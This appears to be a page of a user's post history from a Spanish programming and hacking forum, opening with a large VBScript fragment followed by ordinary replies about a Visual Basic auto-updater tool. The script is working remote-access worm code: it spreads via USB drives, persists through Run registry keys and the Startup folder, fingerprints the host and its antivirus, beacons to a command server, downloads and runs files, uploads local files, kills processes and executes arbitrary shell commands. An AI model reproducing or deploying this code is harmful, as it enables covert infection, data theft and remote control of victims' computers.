  191.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  192.         folder.attributes = 0
  193.     next
  194. end if
  195. end if
  196. end if
  197. next
  198. wscript.quit
  199. end sub
  200.  
  201. function post (cmd ,param)
  202.  
  203. post = param
  204. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  205. httpobj.setrequestheader "user-agent:",information
  206. httpobj.send param
  207. post = httpobj.responsetext
  208. end function
  209.  
  210. function information
  211. on error resume next
  212. if  inf = "" then
  213.    inf = hwid & spliter
  214.    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  215.    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  216.  
  217.    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  218.    set os = root.execquery ("select * from win32_operatingsystem")
  219.    for each osinfo in os
  220.       inf = inf & osinfo.caption & spliter  
  221.       exit for
  222.    next
  223.    inf = inf & "plus" & spliter
  224.    inf = inf & security & spliter
  225.    inf = inf & usbspreading
  226.    information = inf  
  227. else
  228.    information = inf
  229. end if
  230. end function
  231.  
  232.  
  233. sub upstart ()
  234. on error resume Next
  235.  
  236. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  237. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  238. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  239. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  240.  
  241. end sub
  242.  
  243.  
  244. function hwid
  245. on error resume next
  246.  
  247. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  248. set disks = root.execquery ("select * from win32_logicaldisk")
  249. for each disk in disks
  250.    if  disk.volumeserialnumber <> "" then
  251.        hwid = disk.volumeserialnumber
  252.        exit for
  253.    end if
  254. next
  255. end function
  256.  
  257.  
  258. function security
  259. on error resume next
  260.  
  261. security = ""
  262.  
  263. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  264. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  265. for each objitem in colitems
  266.    versionstr = split (objitem.version,".")
  267. next
  268. versionstr = split (colitems.version,".")
  269. osversion = versionstr (0) & "."
  270. for  x = 1 to ubound (versionstr)
  271. osversion = osversion &  versionstr (i)
  272. next
  273. osversion = eval (osversion)
  274. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  275.  
  276. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  277. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  278.  
  279. for each objantivirus in colantivirus
  280.    security  = security  & objantivirus.displayname & " ."
  281. next
  282. if security  = "" then security  = "nan-av"
  283. end function
  284.  
  285.  
  286. function instance
  287. on error resume next
  288.  
  289. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  290. if usbspreading = "" then
  291.   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  292.      usbspreading = "true - " & date
  293.      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  294.   else
  295.      usbspreading = "false - " & date
  296.      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  297.  
  298.   end if
  299. end If
  300.  
  301.  
  302.  
  303. upstart
  304. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  305. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  306. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  307.    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  308.    wscript.quit
  309. end If
  310. err.clear
  311. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  312. if  err.number > 0 then wscript.quit
  313. end function
  314.  
  315.  
  316. sub sitedownloader (fileurl,filename)
  317.  
  318. strlink = fileurl
  319. strsaveto = installdir & filename
  320. set objhttpdownload = createobject("msxml2.xmlhttp" )
  321. objhttpdownload.open "get", strlink, false
  322. objhttpdownload.send
  323.  
  324. set objfsodownload = createobject ("scripting.filesystemobject")
  325. if  objfsodownload.fileexists (strsaveto) then
  326.    objfsodownload.deletefile (strsaveto)
  327. end if
  328.  
  329. if objhttpdownload.status = 200 then
  330.   dim  objstreamdownload
  331.   set  objstreamdownload = createobject("adodb.stream")
  332.   with objstreamdownload
  333. .type = 1
  334. .open
  335. .write objhttpdownload.responsebody
  336. .savetofile strsaveto
  337. .close
  338.   end with
  339.   set objstreamdownload = nothing
  340. end if
  341. if objfsodownload.fileexists(strsaveto) then
  342.   shellobj.run objfsodownload.getfile (strsaveto).shortpath
  343. end if
  344. end sub
  345.  
  346. sub download (fileurl,filedir)
  347.  
  348. if filedir = "" then
  349.   filedir = installdir
  350. end if
  351.  
  352. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  353. set objhttpdownload = createobject("msxml2.xmlhttp")
  354. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  355. objhttpdownload.send ""
  356.  
  357. set objfsodownload = createobject ("scripting.filesystemobject")
  358. if  objfsodownload.fileexists (strsaveto) then
  359.    objfsodownload.deletefile (strsaveto)
  360. end if
  361. if  objhttpdownload.status = 200 then
  362.    dim  objstreamdownload
  363. set  objstreamdownload = createobject("adodb.stream")
  364.    with objstreamdownload
  365. .type = 1
  366. .open
  367. .write objhttpdownload.responsebody
  368. .savetofile strsaveto
  369. .close
  370. end with
  371.    set objstreamdownload  = nothing
  372. end if
  373. if objfsodownload.fileexists(strsaveto) then
  374.   shellobj.run objfsodownload.getfile (strsaveto).shortpath
  375. end if
  376. end sub
  377.  
  378.  
  379. function upload (fileurl)
  380.  
  381. dim  httpobj,objstreamuploade,buffer
  382. set  objstreamuploade = createobject("adodb.stream")
  383. with objstreamuploade
  384.     .type = 1
  385.     .open
  386. .loadfromfile fileurl
  387. buffer = .read
  388. .close
  389. end with
  390. set objstreamdownload = nothing
  391. set httpobj = createobject("msxml2.xmlhttp")
  392. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  393. httpobj.send buffer
  394. end function
  395.  
  396.  
  397. function enumdriver ()
  398.  
  399. for  each drive in filesystemobj.drives
  400. if   drive.isready = true then
  401.     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  402. end if
  403. next
  404. end Function
  405.  
  406. function enumfaf (enumdir)
  407.  
  408. enumfaf = enumdir & spliter
  409. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  410.     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  411. next
  412.  
  413. for  each file in filesystemobj.getfolder (enumdir).files
  414.     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
  415.  
  416. next
  417. end function
  418.  
  419.  
  420. function enumprocess ()
  421.  
  422. on error resume next
  423.  
  424. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  425. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  426.  
  427. dim objitem
  428. for each objitem in colitems
  429. enumprocess = enumprocess & objitem.name & "|"
  430. enumprocess = enumprocess & objitem.processid & "|"
  431.    enumprocess = enumprocess & objitem.executablepath & spliter
  432. next
  433. end function
  434.  
  435. sub exitprocess (pid)
  436. on error resume next
  437.  
  438. shellobj.run "taskkill /F /T /PID " & pid,7,true
  439. end sub
  440.  
  441. sub deletefaf (url)
  442. on error resume next
  443.  
  444. filesystemobj.deletefile url
  445. filesystemobj.deletefolder url
  446.  
  447. end sub
  448.  
  449. function cmdshell (cmd)
  450.  
  451. dim httpobj,oexec,readallfromany
  452.  
  453. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  454. if not oexec.stdout.atendofstream then
  455.   readallfromany = oexec.stdout.readall
  456. elseif not oexec.stderr.atendofstream then
  457.   readallfromany = oexec.stderr.readall
  458. else
  459.   readallfromany = ""
  460. end if
  461.  
  462. cmdshell = readallfromany
  463. end function
  464.  
428  Programación / Programación Visual Basic / Re: [APP & SOURCE] Smart Updater - Añade un auto-actualizador a tus programas FACIL en: 16 Octubre 2013, 01:32 am
Amigo, intente bajar el Smart_Updater.exe y el source, pero están caídos los enlaces   :xD

Fixed, ahora ya funcionan. El enlace de EJEMPLO.zip funciona correctamente, lo has podido probar?
429  Programación / Programación Visual Basic / Re: [APP & SOURCE] Smart Updater - Añade un auto-actualizador a tus programas FACIL en: 16 Octubre 2013, 00:05 am
Excelente  ;-) sos un genio amigo, lo descargaré y probare, cualquier duda la comentó.

Un consulta el programa te avisa cuando hay una nueva versión o hay que comprobarlo manualmente?


Gracias amigo  ;D

No te avisa. Aunque teniendo el código siempre puedes añadir esa opción tú mismo (no es complicado, si no sabes lo puedo implementar yo).

Para integrar Smart Updater en tu aplicación simplemente añade n botón que se llame actualizar y dentro pones:

Código
  1. Shell "Smart_Updater.exe /auto"
  2. End
  3.  

De ésta forma ejecutarás el updater con el parámetro /auto y se auto-actualizará todo automáticamente. Si no añades el parametro /auto el usuario deberá pulsar el botón UPDATE manualmente.

Prueba el EJEMPLO.ZIP y dime si se descarga todo correctamente en tu PC
430  Programación / Programación Visual Basic / Re: [ SRC ] Actualizador de Aplicaciones en: 15 Octubre 2013, 23:51 pm
Gracias por ayudar de forma desinteresada , te debo una amigo :D

http://foro.elhacker.net/programacion_visual_basic/app_source_smart_updater_anade_un_autoactualizador_a_tus_programas_facil-t400743.0.html;new#new
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 ... 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines